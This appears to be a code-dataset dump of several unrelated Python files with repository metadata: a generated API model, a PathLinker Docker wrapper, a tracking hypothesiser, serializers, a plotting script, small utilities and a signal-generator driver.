'queued_task_identifier': 'queued_task_identifier',
'queued_task_state': 'queued_task_state',
'config': 'config',
'on_complete_action': 'on_complete_action',
'environment': 'environment',
'runs': 'runs',
'queued_task': 'queued_task'
}
self._detail_type = detail_type
self._identifier = identifier
self._description = description
self._created = created
self._result = result
self._environment_name = environment_name
self._queued_task_identifier = queued_task_identifier
self._queued_task_state = queued_task_state
self._config = config
self._on_complete_action = on_complete_action
self._environment = environment
self._runs = runs
self._queued_task = queued_task
@classmethod
def from_dict(cls, dikt) -> 'SimulationDetailed':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The SimulationDetailed of this SimulationDetailed. # noqa: E501
:rtype: SimulationDetailed
"""
return util.deserialize_model(dikt, cls)
@property
def detail_type(self) -> str:
"""Gets the detail_type of this SimulationDetailed.
:return: The detail_type of this SimulationDetailed.
:rtype: str
"""
return self._detail_type
@detail_type.setter
def detail_type(self, detail_type: str):
"""Sets the detail_type of this SimulationDetailed.
:param detail_type: The detail_type of this SimulationDetailed.
:type detail_type: str
"""
if detail_type is None:
raise ValueError("Invalid value for `detail_type`, must not be `None`") # noqa: E501
self._detail_type = detail_type
@property
def identifier(self) -> int:
"""Gets the identifier of this SimulationDetailed.
:return: The identifier of this SimulationDetailed.
:rtype: int
"""
return self._identifier
@identifier.setter
def identifier(self, identifier: int):
"""Sets the identifier of this SimulationDetailed.
:param identifier: The identifier of this SimulationDetailed.
:type identifier: int
"""
if identifier is None:
raise ValueError("Invalid value for `identifier`, must not be `None`") # noqa: E501
self._identifier = identifier
@property
def description(self) -> str:
"""Gets the description of this SimulationDetailed.
:return: The description of this SimulationDetailed.
:rtype: str
"""
return self._description
@description.setter
def description(self, description: str):
"""Sets the description of this SimulationDetailed.
:param description: The description of this SimulationDetailed.
:type description: str
"""
self._description = description
@property
def created(self) -> datetime:
"""Gets the created of this SimulationDetailed.
:return: The created of this SimulationDetailed.
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created: datetime):
"""Sets the created of this SimulationDetailed.
:param created: The created of this SimulationDetailed.
:type created: datetime
"""
if created is None:
raise ValueError("Invalid value for `created`, must not be `None`") # noqa: E501
self._created = created
@property
def result(self) -> int:
"""Gets the result of this SimulationDetailed.
0 is scheduled, -1 is prep failed, -100 is sim failed, 100 is sim succeeded # noqa: E501
:return: The result of this SimulationDetailed.
:rtype: int
"""
return self._result
@result.setter
def result(self, result: int):
"""Sets the result of this SimulationDetailed.
0 is scheduled, -1 is prep failed, -100 is sim failed, 100 is sim succeeded # noqa: E501
:param result: The result of this SimulationDetailed.
:type result: int
"""
if result is None:
raise ValueError("Invalid value for `result`, must not be `None`") # noqa: E501
self._result = result
@property
def environment_name(self) -> str:
"""Gets the environment_name of this SimulationDetailed.
Name of the simulation environment # noqa: E501
:return: The environment_name of this SimulationDetailed.
:rtype: str
"""
return self._environment_name
@environment_name.setter
def environment_name(self, environment_name: str):
"""Sets the environment_name of this SimulationDetailed.
Name of the simulation environment # noqa: E501
:param environment_name: The environment_name of this SimulationDetailed.
:type environment_name: str
"""
if environment_name is None:
raise ValueError("Invalid value for `environment_name`, must not be `None`") # noqa: E501
self._environment_name = environment_name
@property
def queued_task_identifier(self) -> str:
"""Gets the queued_task_identifier of this SimulationDetailed.
Identifier of the task associated to this simulation # noqa: E501
:return: The queued_task_identifier of this SimulationDetailed.
:rtype: str
"""
return self._queued_task_identifier
@queued_task_identifier.setter
def queued_task_identifier(self, queued_task_identifier: str):
"""Sets the queued_task_identifier of this SimulationDetailed.
Identifier of the task associated to this simulation # noqa: E501
:param queued_task_identifier: The queued_task_identifier of this SimulationDetailed.
:type queued_task_identifier: str
"""
self._queued_task_identifier = queued_task_identifier
@property
def queued_task_state(self) -> int:
"""Gets the queued_task_state of this SimulationDetailed.
Read only value, taken from associated task # noqa: E501
:return: The queued_task_state of this SimulationDetailed.
:rtype: int
"""
return self._queued_task_state
@queued_task_state.setter
def queued_task_state(self, queued_task_state: int):
"""Sets the queued_task_state of this SimulationDetailed.
Read only value, taken from associated task # noqa: E501
:param queued_task_state: The queued_task_state of this SimulationDetailed.
:type queued_task_state: int
"""
self._queued_task_state = queued_task_state
@property
def config(self) -> object:
"""Gets the config of this SimulationDetailed.
Configuration of the simulation. # noqa: E501
:return: The config of this SimulationDetailed.
:rtype: object
"""
return self._config
@config.setter
def config(self, config: object):
"""Sets the config of this SimulationDetailed.
Configuration of the simulation. # noqa: E501
:param config: The config of this SimulationDetailed.
:type config: object
"""
if config is None:
raise ValueError("Invalid value for `config`, must not be `None`") # noqa: E501
self._config = config
@property
def on_complete_action(self) -> object:
"""Gets the on_complete_action of this SimulationDetailed.
Action to take when simulation completes. # noqa: E501
:return: The on_complete_action of this SimulationDetailed.
:rtype: object
"""
return self._on_complete_action
@on_complete_action.setter
def on_complete_action(self, on_complete_action: object):
"""Sets the on_complete_action of this SimulationDetailed.
Action to take when simulation completes. # noqa: E501
:param on_complete_action: The on_complete_action of this SimulationDetailed.
:type on_complete_action: object
"""
self._on_complete_action = on_complete_action
@property
def environment(self) -> SimulationEnvironmentDetailed:
"""Gets the environment of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The environment of this SimulationDetailed.
:rtype: SimulationEnvironmentDetailed
"""
return self._environment
@environment.setter
def environment(self, environment: SimulationEnvironmentDetailed):
"""Sets the environment of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param environment: The environment of this SimulationDetailed.
:type environment: SimulationEnvironmentDetailed
"""
self._environment = environment
@property
def runs(self) -> List[SimulationRunDetailed]:
"""Gets the runs of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The runs of this SimulationDetailed.
:rtype: List[SimulationRunDetailed]
"""
return self._runs
@runs.setter
def runs(self, runs: List[SimulationRunDetailed]):
"""Sets the runs of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param runs: The runs of this SimulationDetailed.
:type runs: List[SimulationRunDetailed]
"""
self._runs = runs
@property
def queued_task(self) -> TaskDetailed:
"""Gets the queued_task of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The queued_task of this SimulationDetailed.
:rtype: TaskDetailed
"""
return self._queued_task
@queued_task.setter
def queued_task(self, queued_task: TaskDetailed):
"""Sets the queued_task of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param queued_task: The queued_task of this SimulationDetailed.
:type queued_task: TaskDetailed
"""
self._queued_task = queued_task
| 34.20438
| 413
| 0.660905
| 13,411
| 0.953976
| 0
| 0
| 9,323
| 0.663181
| 0
| 0
| 8,506
| 0.605065
|
49f3758e9d44d3107ec62931b01722d7ad937589
| 5,857
|
py
|
Python
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 3
|
2021-05-05T23:40:39.000Z
|
2021-05-13T03:35:22.000Z
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 41
|
2021-04-27T01:48:28.000Z
|
2022-03-14T20:11:24.000Z
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 2
|
2021-07-06T18:27:19.000Z
|
2022-01-25T03:56:49.000Z
|
import docker
import os
import sys
import pandas as pd
import warnings
from src.PRM import PRM
from pathlib import Path
from src.util import prepare_path_docker
__all__ = ['PathLinker']
class PathLinker(PRM):
required_inputs = ['nodetypes', 'network']
@staticmethod
def generate_inputs(data, filename_map):
"""
Access fields from the dataset and write the required input files
@param data: dataset
@param filename_map: a dict mapping file types in the required_inputs to the filename for that type
@return:
"""
for input_type in PathLinker.required_inputs:
if input_type not in filename_map:
raise ValueError(f"{input_type} filename is missing")
#Get sources and targets for node input file
sources_targets = data.request_node_columns(["sources", "targets"])
if sources_targets is None:
return False
both_series = sources_targets.sources & sources_targets.targets
for index,row in sources_targets[both_series].iterrows():
warn_msg = row.NODEID+" has been labeled as both a source and a target."
warnings.warn(warn_msg)
#Create nodetype file
input_df = sources_targets[["NODEID"]].copy()
input_df.columns = ["#Node"]
input_df.loc[sources_targets["sources"] == True,"Node type"]="source"
input_df.loc[sources_targets["targets"] == True,"Node type"]="target"
input_df.to_csv(filename_map["nodetypes"],sep="\t",index=False,columns=["#Node","Node type"])
#This is pretty memory intensive. We might want to keep the interactome centralized.
data.get_interactome().to_csv(filename_map["network"],sep="\t",index=False,columns=["Interactor1","Interactor2","Weight"],header=["#Interactor1","Interactor2","Weight"])
# Skips parameter validation step
@staticmethod
def run(nodetypes=None, network=None, output_file=None, k=None):
"""
Run PathLinker with Docker
@param nodetypes: input node types with sources and targets (required)
@param network: input network file (required)
@param output_file: path to the output pathway file (required)
@param k: path length (optional)
"""
# Add additional parameter validation
# Do not require k
# Use the PathLinker default
# Could consider setting the default here instead
if not nodetypes or not network or not output_file:
raise ValueError('Required PathLinker arguments are missing')
# Initialize a Docker client using environment variables
client = docker.from_env()
# work dir set as the root of the repository
work_dir = Path(__file__).parent.parent.absolute()
# create path objects for input files
node_file = Path(nodetypes)
network_file = Path(network)
out_dir = Path(output_file).parent
# When renaming the output file, the output directory must already exist
Path(work_dir, out_dir).mkdir(parents=True, exist_ok=True)
command = ['python', '/home/run.py', '/home/spras/'+network_file.as_posix(),
'/home/spras/'+node_file.as_posix()]
# Add optional argument
if k is not None:
command.extend(['-k', str(k)])
#Don't perform this step on systems where permissions aren't an issue like windows
need_chown = True
try:
uid = os.getuid()
except AttributeError:
need_chown = False
try:
container_output = client.containers.run(
'reedcompbio/pathlinker',
command,
stderr=True,
volumes={
prepare_path_docker(work_dir): {'bind': '/home/spras', 'mode': 'rw'}
},
working_dir='/home/spras/')
print(container_output.decode('utf-8'))
if need_chown:
#This command changes the ownership of output files so we don't
# get a permissions error when snakemake tries to touch the files
# PathLinker writes output files to the working directory
chown_command = " ".join(['chown',str(uid),'./out*-ranked-edges.txt'])
client.containers.run('reedcompbio/pathlinker',
chown_command,
stderr=True,
volumes={prepare_path_docker(work_dir): {'bind': '/home/spras', 'mode': 'rw'}},
working_dir='/home/spras/')
finally:
# Not sure whether this is needed
client.close()
# Rename the primary output file to match the desired output filename
# Currently PathLinker only writes one output file so we do not need to delete others
Path(output_file).unlink(missing_ok=True)
# We may not know the value of k that was used
output_edges = Path(next(work_dir.glob('out*-ranked-edges.txt')))
output_edges.rename(output_file)
@staticmethod
def parse_output(raw_pathway_file, standardized_pathway_file):
"""
Convert a predicted pathway into the universal format
@param raw_pathway_file: pathway file produced by an algorithm's run function
@param standardized_pathway_file: the same pathway written in the universal format
"""
# Questions: should there be a header/optional columns?
# What about multiple raw_pathway_files
# We should not allow spaces in the node names if we use space separator.
df = pd.read_csv(raw_pathway_file,sep='\t').take([0,1,2],axis=1)
df.to_csv(standardized_pathway_file, header=False,index=False,sep=' ')
| 42.751825
| 177
| 0.626771
| 5,668
| 0.967731
| 0
| 0
| 5,542
| 0.946218
| 0
| 0
| 2,631
| 0.449206
|
49f40691673fa4f67fa8dd4ced6c7bd474270052
| 4,978
|
py
|
Python
|
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | 1
|
2019-12-26T14:55:03.000Z
|
2019-12-26T14:55:03.000Z
|
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | null | null | null |
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .base import Hypothesiser
from ..base import Property
from ..types.multihypothesis import MultipleHypothesis
from ..types.prediction import (TaggedWeightedGaussianStatePrediction,
WeightedGaussianStatePrediction)
from ..types.state import TaggedWeightedGaussianState
class GaussianMixtureHypothesiser(Hypothesiser):
"""Gaussian Mixture Prediction Hypothesiser based on an underlying Hypothesiser
Generates a list of :class:`MultipleHypothesis`, where each
MultipleHypothesis in the list contains SingleHypotheses
pertaining to an individual component-detection hypothesis
"""
hypothesiser = Property(
Hypothesiser,
doc="Underlying hypothesiser used to generate detection-target pairs")
order_by_detection = Property(
bool,
default=False,
doc="Flag to order the :class:`~.MultipleHypothesis` "
"list by detection or component")
def hypothesise(self, components, detections, timestamp):
"""Form hypotheses for associations between Detections and Gaussian
Mixture components.
Parameters
----------
components : :class:`list`
List of :class:`~.WeightedGaussianState` components
representing the state of the target space
detections : list of :class:`Detection`
Retrieved measurements
timestamp : datetime
Time of the detections/predicted states
Returns
-------
list of :class:`~.MultipleHypothesis`
Each :class:`~.MultipleHypothesis` in the list contains
a list of :class:`~SingleHypothesis` pertaining
to the same Gaussian component unless
order_by_detection is true, then they
pertain to the same Detection.
"""
# Check to make sure all detections are obtained from the same time
timestamps = set([detection.timestamp for detection in detections])
if len(timestamps) > 1:
raise ValueError("All detections must have the same timestamp")
hypotheses = list()
for component in components:
# Get hypotheses for that component for all measurements
component_hypotheses = self.hypothesiser.hypothesise(component,
detections,
timestamp)
for hypothesis in component_hypotheses:
if isinstance(component, TaggedWeightedGaussianState):
hypothesis.prediction = \
TaggedWeightedGaussianStatePrediction(
tag=component.tag if component.tag != "birth"
else None,
weight=component.weight,
state_vector=hypothesis.prediction.state_vector,
covar=hypothesis.prediction.covar,
timestamp=hypothesis.prediction.timestamp
)
else:
hypothesis.prediction = WeightedGaussianStatePrediction(
weight=component.weight,
state_vector=hypothesis.prediction.state_vector,
covar=hypothesis.prediction.covar,
timestamp=hypothesis.prediction.timestamp
)
# Create Multiple Hypothesis and add to list
if len(component_hypotheses) > 0:
hypotheses.append(MultipleHypothesis(component_hypotheses))
# Reorder list of MultipleHypothesis so that they are ordered
# by detection, not component
if self.order_by_detection:
single_hypothesis_list = list()
# Retrieve all single hypotheses
for multiple_hypothesis in hypotheses:
for single_hypothesis in multiple_hypothesis:
single_hypothesis_list.append(single_hypothesis)
reordered_hypotheses = list()
# Get miss detected components
miss_detections_hypothesis = MultipleHypothesis(
[x for x in single_hypothesis_list if not x])
for detection in detections:
# Create multiple hypothesis per detection
detection_multiple_hypothesis = \
MultipleHypothesis(list([hypothesis for hypothesis in single_hypothesis_list
if hypothesis.measurement == detection]))
# Add to new list
reordered_hypotheses.append(detection_multiple_hypothesis)
# Add miss detected hypothesis to end
reordered_hypotheses.append(miss_detections_hypothesis)
# Assign reordered list to original list
hypotheses = reordered_hypotheses
return hypotheses
| 45.669725
| 96
| 0.606268
| 4,647
| 0.933507
| 0
| 0
| 0
| 0
| 0
| 0
| 1,767
| 0.354962
|
49f45e903b240c04c0489fac65ede708075df463
| 1,458
|
py
|
Python
|
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework import serializers
from apps.approval.models import CommitteeApplication, CommitteePriority
from apps.authentication.serializers import UserSerializer
class CommitteeSerializer(serializers.ModelSerializer):
group_name = serializers.SerializerMethodField(source='group')
class Meta:
model = CommitteePriority
fields = ('group', 'group_name', 'priority')
def get_group_name(self, instance):
return instance.group.name
class CommitteeApplicationSerializer(serializers.ModelSerializer):
committees = CommitteeSerializer(many=True, source='committeepriority_set')
applicant = UserSerializer(read_only=True)
class Meta:
model = CommitteeApplication
fields = ('name', 'email', 'applicant', 'application_text', 'prioritized', 'committees')
def create(self, validated_data):
committees = validated_data.pop('committeepriority_set')
application = CommitteeApplication(**validated_data)
try:
application.clean()
except DjangoValidationError as django_error:
raise serializers.ValidationError(django_error.message)
application.save()
for committee in committees:
CommitteePriority.objects.create(committee_application=application, **committee)
return CommitteeApplication.objects.get(pk=application.pk)
| 36.45
| 96
| 0.742798
| 1,204
| 0.825789
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.102195
|
49f6c77afc94bafb870dc3b17a265d3485c6c64e
| 2,909
|
py
|
Python
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 35
|
2018-05-25T16:48:23.000Z
|
2022-03-15T14:35:07.000Z
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 3
|
2018-03-18T13:03:09.000Z
|
2020-01-17T12:09:12.000Z
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 14
|
2018-05-25T16:48:24.000Z
|
2022-01-04T12:56:31.000Z
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.cross_validation import train_test_split
import utils
import glob, os
import pca.dataanalyzer as da, pca.pca as pca
from sklearn.metrics import accuracy_score
# visulaize the important characteristics of the dataset
import matplotlib.pyplot as plt
seed = 0
num_headers = 16
data_len = 54*num_headers #1460
dirs = ["C:/Users/salik/Documents/Data/LinuxChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsFirefox/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsSalik/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsAndreas/{}/".format(num_headers)]
# dirs = ["E:/Data/h5/https/", "E:/Data/h5/netflix/"]
# step 1: get the data
dataframes = []
num_examples = 0
for dir in dirs:
for fullname in glob.iglob(dir + '*.h5'):
filename = os.path.basename(fullname)
df = utils.load_h5(dir, filename)
dataframes.append(df)
num_examples = len(df.values)
# create one large dataframe
data = pd.concat(dataframes)
data.sample(frac=1, random_state=seed).reset_index(drop=True)
num_rows = data.shape[0]
columns = data.columns
print(columns)
# step 2: get features (x) and convert it to numpy array
x = da.getbytes(data, data_len)
# step 3: get class labels y and then encode it into number
# get class label data
y = data['label'].values
# encode the class label
class_labels = np.unique(y)
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
# step 4: split the data into training set and test set
test_percentage = 0.5
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_percentage, random_state=seed)
plot_savename = "histogram_payload"
from matplotlib import rcParams
# Make room for xlabel which is otherwise cut off
rcParams.update({'figure.autolayout': True})
# scatter plot the sample points among 5 classes
# markers = ('s', 'd', 'o', '^', 'v', ".", ",", "<", ">", "8", "p", "P", "*", "h", "H", "+", "x", "X", "D", "|", "_")
color_map = {0: '#487fff', 1: '#d342ff', 2: '#4eff4e', 3: '#2ee3ff', 4: '#ffca43', 5:'#ff365e', 6:'#626663'}
plt.figure()
for idx, cl in enumerate(np.unique(y_test)):
# Get count of unique values
values, counts = np.unique(x_test[y_test == cl], return_counts=True)
# Maybe remove zero as there is a lot of zeros in the header
# values = values[1:]
# counts = counts[1:]
n, bins, patches = plt.hist(values, weights=counts, bins=256, facecolor=color_map[idx], label=class_labels[cl], alpha=0.8)
plt.legend(loc='upper right')
plt.title('Histogram of : {}'.format(class_labels))
plt.tight_layout()
# plt.savefig('{0}{1}.png'.format(plot_savename, int(perplexity)), dpi=300)
plt.show()
| 36.822785
| 127
| 0.700928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,189
| 0.408732
|
49f6f1f5b6e7113a385ba89e9bd8fb4c985968b5
| 421
|
py
|
Python
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 10
|
2021-03-16T18:05:53.000Z
|
2022-03-20T20:40:38.000Z
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 8
|
2021-03-17T18:32:54.000Z
|
2021-12-31T19:58:01.000Z
|
examples/board_toolkit_simpletest.py
|
Neradoc/Adafruit_Board_Toolkit
|
c1602192f015924ce4ffd4e90dcd44769e565780
|
[
"MIT",
"BSD-3-Clause",
"MIT-0",
"Unlicense"
] | 4
|
2021-04-21T13:48:18.000Z
|
2022-03-13T15:07:01.000Z
|
# SPDX-FileCopyrightText: Copyright (c) 2021 Dan Halbert for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import adafruit_board_toolkit.circuitpython_serial
comports = adafruit_board_toolkit.circuitpython_serial.repl_comports()
if not comports:
raise Exception("No CircuitPython boards found")
# Print the device paths or names that connect to a REPL.
print([comport.device for comport in comports])
| 32.384615
| 80
| 0.812352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 205
| 0.486936
|
49f718d53ef81854c33add0bb6b608250490d75e
| 798
|
py
|
Python
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 29
|
2022-01-05T07:07:18.000Z
|
2022-03-29T20:09:03.000Z
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 3
|
2022-01-23T17:33:40.000Z
|
2022-03-10T03:36:21.000Z
|
saq/utils.py
|
cofin/saq
|
be81f383a0904e9084e24ccb5334e07fc5b61e00
|
[
"MIT"
] | 4
|
2022-01-06T18:33:33.000Z
|
2022-03-23T18:44:19.000Z
|
import time
import uuid
from random import random
def now():
return int(time.time() * 1000)
def uuid1():
return str(uuid.uuid1())
def millis(s):
return s * 1000
def seconds(ms):
return ms / 1000
def exponential_backoff(
attempts,
base_delay,
max_delay=None,
jitter=True,
):
"""
Get the next delay for retries in exponential backoff.
attempts: Number of attempts so far
base_delay: Base delay, in seconds
max_delay: Max delay, in seconds. If None (default), there is no max.
jitter: If True, add a random jitter to the delay
"""
if max_delay is None:
max_delay = float("inf")
backoff = min(max_delay, base_delay * 2 ** max(attempts - 1, 0))
if jitter:
backoff = backoff * random()
return backoff
| 19
| 73
| 0.641604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 283
| 0.354637
|
49f8927dba9de24eccfdfa6bd46fde3e6e325f82
| 221
|
py
|
Python
|
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
pipeline.py
|
sanidhya-singh/dagster-pipelines
|
671c4869dca14f96902981e2e8c84df1319ca89e
|
[
"MIT"
] | null | null | null |
from dagster import job, op
@op
def get_name():
return "dagster"
@op
def hello(name: str):
print(f"Hello, {name}!")
@job(description="Hello world Dagster pipeline")
def hello_dagster():
hello(get_name())
| 13.8125
| 48
| 0.669683
| 0
| 0
| 0
| 0
| 185
| 0.837104
| 0
| 0
| 56
| 0.253394
|
49fab0bf939b0f4cf2782196c0ddc5090bf9b5e5
| 4,508
|
py
|
Python
|
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | 3
|
2020-08-30T16:11:49.000Z
|
2021-03-05T12:09:30.000Z
|
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | null | null | null |
qulab/drivers/AFG3102.py
|
liuqichun3809/quantum-lab
|
05bea707b314ea1687866f56ee439079336cfbbc
|
[
"MIT"
] | 2
|
2019-07-24T15:12:31.000Z
|
2019-09-20T02:17:28.000Z
|
# -*- coding: utf-8 -*-
import time
import numpy as np
from qulab.device import BaseDriver, QInteger, QOption, QReal, QString, QVector
class Driver(BaseDriver):
error_command = '*ESR?'
support_models = ['AFG3102']
quants = [
QOption('Output',ch=1,
set_cmd='OUTP%(ch)d %(option)s', get_cmd='OUTP%(ch)d?',
options=[('OFF', 'OFF'), ('ON', 'ON')]), # must set chanel
QOption('Function',ch=1,set_cmd='SOUR%(ch)d:FUNC %(option)s',get_cmd='SOUR%(ch)d:FUNC?',
options=[('Sin','SIN'),('Square','SQU'),('Pulse','PULS'),('Ramp','RAMP'),
('PRNoise','PRN'),('DC','DC'),('SINC','SINC'),('Gaussian','GAUS'),
('Lorentz','LOR'),('Erise','ERIS'),('Edecay','EDEC'),('Haversine','HAV'),
('User','USER'),('User2','USER2')]),
QReal('Frequency',unit='Hz',ch=1,set_cmd='SOUR%(ch)d:FREQ %(value)e%(unit)s',get_cmd='SOUR%(ch)d:FREQ?'),
QReal('Phase',unit='rad',ch=1,set_cmd='SOUR%(ch)d:PHAS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:PHAS?'),
QReal('Pulse Delay',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:DEL %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:DEL?'),
QReal('Pulse Period',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:PER %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:PER?'),
QReal('Pulse Width',unit='s',ch=1,set_cmd='SOUR%(ch)d:PULS:WIDT %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:PULS:WIDT?'),
#Burst Mode
QReal('Burst Tdelay',unit='s',ch=1,set_cmd='SOUR%(ch)d:BURS:TDEL %(value).9e%(unit)s',get_cmd='SOUR%(ch)d:BURS:TDEL?'),
QReal('Burst Ncycles',ch=1,set_cmd='SOUR%(ch)d:BURS:NCYC %(value)d',get_cmd='SOUR%(ch)d:BURS:NCYC?'),
##
QReal('Frequency',unit='Hz',ch=1,set_cmd='SOUR%(ch)d:FREQ %(value)e%(unit)s',get_cmd='SOUR%(ch)d:FREQ?'),
QReal('Phase',unit='DEG',ch=1,set_cmd='SOUR%(ch)d:PHAS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:PHAS?'),
QReal('High Level',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:HIGH %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:HIGH?'),
QReal('Low Level',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:LOW %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:LOW?'),
QReal('Offset',unit='V',ch=1,set_cmd='SOUR%(ch)d:VOLT:OFFS %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:OFFS?'),
QReal('Amplitude',unit='VPP',ch=1,set_cmd='SOUR%(ch)d:VOLT:AMPL %(value)f%(unit)s',get_cmd='SOUR%(ch)d:VOLT:AMPL?'),
]
def reset(self,delay1=0,delay2=0):
#init
self.write('*CLS')
self.write('*RST')
#set external clock;external source;burst mode&cycle=1&trigdelay=0
self.write('SOURce:ROSCillator:SOURce EXT')
self.write('TRIGger:SEQuence:SOURce EXTernal')
self.write('SOURce1:BURSt:STATe ON')
self.write('SOURce1:BURSt:NCYCles 1')
self.write('SOURce1:BURSt:MODE TRIGgered')
self.write('SOURce1:BURSt:DELay %fus' %delay1)
self.write('SOURce2:BURSt:STATe ON')
self.write('SOURce2:BURSt:NCYCles 1')
self.write('SOURce2:BURSt:MODE TRIGgered')
self.write('SOURce2:BURSt:TDELay %fns' %delay2)
#在创建好的波形文件中,写入或者更新具体波形
def upwave(self,points,ch=1,T0=100):
pointslen=len(points)
pointslen2=2*pointslen
#写入波形数据
self.write('DATA:DEFine EMEMory,%d' %pointslen)
self.write('DATA:POINts EMEMory, %d' %pointslen)
message=':DATA:DATA EMEMory,'# % (len(str(pointslen2)),pointslen2)
points = points.clip(-1,1)
values=np.zeros(pointslen).astype(np.uint16)
#乘积选用8191是为了防止最终值大于16383
values = (points * 8191).astype(np.uint16)+8192 #.astype(np.uint16)
byte=np.zeros(pointslen2).astype(np.uint8)
#将原先的两比特数据点,分割为高低两个比特
byte[1:pointslen2:2]=(values & 0b11111111).astype(np.uint8)
byte[0:pointslen2:2]=((values & 0b11111100000000) >> 8).astype(np.uint8)
#write_binary_value中的message参数不要包括#42048的信息,因为pyvisa可以自动算出结果。详见pyvisa中util.py内的to_binary_block
#AFG3102选用big_endian。这表示程序按照我给的顺序将二进制包写进去
self.write_binary_values(message, byte, datatype='B',is_big_endian=False,termination=None, encoding=None)
# self.write('enable' )
self.write('TRAC:COPY USER%d,EMEM' %ch)
self.write('SOURce%d:FUNCTION USER%d' %(ch,ch))
#set frequency:because the wave total length is set by this parameter,typical for 1Mhz means the wave length is set to 1us!!
self.write('SOURce%d:FREQuency:FIXed %fkHz' %(ch,1e3/T0))
self.write('OUTPut%d:STATe ON' %ch)
| 53.035294
| 132
| 0.618234
| 4,592
| 0.970414
| 0
| 0
| 0
| 0
| 0
| 0
| 2,500
| 0.528318
|
49fc564845398fd6fccf8887fc72513069095963
| 1,357
|
py
|
Python
|
02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | 1
|
2020-12-03T02:41:07.000Z
|
2020-12-03T02:41:07.000Z
|
02-intermediate/lstm_network/main.py
|
kevin2018pg/pytorch-notes
|
4ba3827fccbf17ec446b2538186dd78dea3ecb50
|
[
"MIT"
] | null | null | null |
